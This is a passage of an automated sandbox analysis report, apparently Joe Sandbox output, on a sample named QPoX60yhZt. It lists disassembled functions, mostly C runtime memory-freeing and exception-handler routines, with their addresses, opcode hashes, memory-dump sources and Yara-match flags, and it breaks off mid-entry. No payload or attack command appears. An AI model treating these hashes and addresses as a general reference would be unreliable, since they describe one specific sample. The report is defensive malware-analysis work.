Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05C10449

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 0e26052e50218ebb26d49c133031be64622577541715ba8bba14f6e32119b45a
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 41F05C3930020557CB049F35DC49B7A7F91FFC2714B464059EE058B240C6319982D794

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05BF9E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,05BF95DF), ref: 05BF9E72

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 05BFF6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 05BFF818

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 50ecb24a020e19246716be4da4cf0d3f9a9c3f282ea6121ecfba435fb515128a
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: E1515521708745A7DF38897C8558BBEB39AFB02204F1809DADB43C7291EA15F98DC396

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 05BFC3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 05065112b0121b8d9d10fbc2eb784bb27a150bb8f32cc8a2c5cd4160b7dcaf0b
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: BE918A7210C0A749DB29863E853947DFFE2AA412A171917DED5F3CB1C1EE14E9ACD720

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 05BFC6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 63ed9eea8b83beee8331daa49155241ff3d51c161979830a0725eca4b599a4eb
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 2C918A7310C0A74ADB69863D957443DFFE2AA412A170A07DDD5F2CB1C5EE10E9ACD720

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 05BFC131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 0ad59e4b021df4ab71750ac422ee194b67c581db1efd37065a2d58b7556cd59b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 4891777220D0A74ADB29467E847447DFFE2EA411A131907DED5F3CB5C1EE24AAAC9720

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 05BFBE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 698622ca1ec836ab0c7d9730d7035a4a58b4f449525f8476a3b5425465056c3c
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8E81577210C0A749DB6D863DC57443EFFE2BA412A171A07DED5F2CA5C1ED24A5ACDB20

Uniqueness

Uniqueness Score: -1.00%

Function 041954B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, Offset: 04195000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4195000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: f0b2cc6d483e1242ef7482d6eb326b97b3f08e5e00106b7229cfe4798e658485
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 2C112A73340100AFEB95DE55DCC5EA673EAEB89220B2980A9E908DB316E775EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 05BF0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: e1342fd463d95840c037094bfce338b12b1b2d5202b0a28ddd916dcdcc54ff6e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5101F77AA016089FDF21DF24C809FBA33E5FB85306F0540E4DA0797252E370B8458B80

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 05C021D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C02241
_free.LIBCMT ref: 05C02257
_free.LIBCMT ref: 05C02268
_free.LIBCMT ref: 05C02279
_free.LIBCMT ref: 05C02290
GetCPInfo.KERNEL32(?,?), ref: 05C022D8

Part of subcall function 05C0B3B5: _free.LIBCMT ref: 05C0B420

_free.LIBCMT ref: 05C02484
_free.LIBCMT ref: 05C02497
_free.LIBCMT ref: 05C024A5
_free.LIBCMT ref: 05C024B0
_free.LIBCMT ref: 05C024F2
_free.LIBCMT ref: 05C024FA
_free.LIBCMT ref: 05C02502
_free.LIBCMT ref: 05C0250A
_free.LIBCMT ref: 05C02518

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 5b854177352c60086d094bcc2e507cb7ff5b37df52208beee3d4ff78f6d9ca2a
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: C6B1D270A002059FDF21DFB8C888BEEB7F5FF08300F145869E995A7280DB35A945DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 05C0F788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 05C0F7CC

Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB38
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB4A
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB5C
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB6E
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB80
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EB92
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBA4
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBB6
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBC8
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBDA
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBEC
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EBFE
Part of subcall function 05C0EB1B: _free.LIBCMT ref: 05C0EC10

_free.LIBCMT ref: 05C0F7C1

Part of subcall function 05C06501: HeapFree.KERNEL32(00000000,00000000,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?), ref: 05C06517
Part of subcall function 05C06501: GetLastError.KERNEL32(?,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?,?), ref: 05C06529

_free.LIBCMT ref: 05C0F7E3
_free.LIBCMT ref: 05C0F7F8
_free.LIBCMT ref: 05C0F803
_free.LIBCMT ref: 05C0F825
_free.LIBCMT ref: 05C0F838
_free.LIBCMT ref: 05C0F846
_free.LIBCMT ref: 05C0F851
_free.LIBCMT ref: 05C0F889
_free.LIBCMT ref: 05C0F890
_free.LIBCMT ref: 05C0F8AD
_free.LIBCMT ref: 05C0F8C5

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: fcf94e6b3dbc134e590f423a67eefa797b4c6509526ba8e3b6789172906e5b5d
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 45313B316047019FEB31AA78D888BAA77E9FF01310F146D2DE49AD61D0DF75EAD09A21

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

sqrt, xrefs: 004233CD
/BB, xrefs: 0042342E
log10, xrefs: 00423293, 004232E3
asin, xrefs: 004233B5
exp, xrefs: 0042330E, 00423370
log, xrefs: 004232EF, 004232FB
acos, xrefs: 004233C1
pow, xrefs: 0042332D, 004233D9, 004233EC

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 05C06E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C06EA0

Part of subcall function 05C06501: HeapFree.KERNEL32(00000000,00000000,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?), ref: 05C06517
Part of subcall function 05C06501: GetLastError.KERNEL32(?,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?,?), ref: 05C06529

_free.LIBCMT ref: 05C06EAC
_free.LIBCMT ref: 05C06EB7
_free.LIBCMT ref: 05C06EC2
_free.LIBCMT ref: 05C06ECD
_free.LIBCMT ref: 05C06ED8
_free.LIBCMT ref: 05C06EE3
_free.LIBCMT ref: 05C06EEE
_free.LIBCMT ref: 05C06EF9
_free.LIBCMT ref: 05C06F07

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: 0861cc8580e2e633d2d8d09f0076cb7321d9a07a8c2e12b588506f55e78e8c59
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: DD11C876200508BFDB11EF95C844CDD3BA5EF04354B4158A5FA498F2B5DA32EEA0EB81

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs
